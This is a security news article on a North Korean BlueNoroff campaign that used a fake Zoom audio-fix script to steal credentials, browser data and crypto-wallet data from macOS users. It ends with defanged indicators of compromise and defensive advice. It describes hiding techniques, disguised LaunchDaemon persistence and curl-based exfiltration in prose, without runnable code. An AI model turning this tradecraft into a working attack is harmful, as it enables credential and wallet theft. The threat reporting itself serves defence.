Zoom App Targeted by BlueNoroff Hackers for Infostealer Malware Attack

A recent investigation by cybersecurity experts at Field Effect Analysis has uncovered a targeted cyberattack leveraging the popular Zoom video conferencing platform as a vector for infostealer malware.

This sophisticated campaign is attributed to BlueNoroff, a North Korean state-sponsored hacking group, known for its financially motivated operations under the notorious Lazarus Group umbrella.

In the attack, threat actors exploited the trust users have in business workflows using Zoom, a tool essential for remote collaboration.

Starting with a scheduled Zoom meeting on May 28, 2025, involving a Canadian online gambling provider, the attackers impersonated a known contact a tactic consistent with previous attacks by credential theft and impersonation.

The attack began after victims experienced technical difficulties during a meeting, with a second participant prompting the user to run a script masquerading as a Zoom audio repair tool.

The script, displayed as a benign update utility for Zoom, was in reality a carefully constructed attack.

After approximately 10,000 blank lines likely to obscure malicious content, the script downloaded and executed a secondary payload using a fake domain: zoom-tech[.]us.

WHOIS records and threat intelligence sources showed this domain, registered under daniel.castagnolii@gmail[.]com on April 14, 2025, was not affiliated with Zoom’s legitimate services.

Several similar domains were also found to have been registered around the same time, indicating a broad campaign.

Technical Exploit Chain: Rapid Infection and Data Exfiltration

Once executed, the payload performed a rapid infection sequence:

1. Initial Script Execution:
   The victim’s credentials were harvested, stored in temporary files, and exfiltrated using curl commands.
2. Malware Implantation:
   Additional malware components were downloaded, masquerading as legitimate macOS utilities. The malware used persistence techniques such as installing LaunchDaemons under names like com.apple.security.update and com.apple.wifi.updater.
3. Data Collection:
   The attackers collected system and network information, browser profiles, login data, cookies, and specifically targeted cryptocurrency wallet-related browser extensions. Data was staged in temporary directories before being compressed and exfiltrated to attacker-controlled servers.

The attack’s speed and stealth were significant: data exfiltration began even before the malware was fully installed.

Attackers utilized built-in macOS tools such as caffeinate to prevent system sleep and executed commands such as ps aux, ifconfig, and targeted file searches to harvest sensitive information.

Indicators of Compromise (IoCs) and Mitigation Strategies

Key indicators of compromise include specific file paths and malicious domains, such as:

• Binaries: /Library/RestoreKey/com.apple.siri.updater, /Users/<username>/Library/com.apple.wifi.updater/Wi-Fi Updater.app/Contents/MacOS/Wi-Fi Updater
• C2 Domains: zoom-tech[.]us, ajayplamingo[.]com, zmwebsdk[.]com
• IP: 23.254.203[.]244

To defend against such threats, organizations should:

• Educate users on recognizing social engineering attempts, especially impersonation during video calls.
• Restrict script execution from untrusted locations and enforce application whitelisting.
• Utilize MDR/EDR solutions to monitor for suspicious behavior and block data exfiltration.
• Continuously audit endpoints and maintain strict least privilege access controls.

This incident highlights the evolving tactics of financially motivated APT groups, who are increasingly embedding malicious activity within routine business operations and leveraging trusted tools to exploit user trust, underscoring the need for vigilant cybersecurity awareness and robust technical defenses.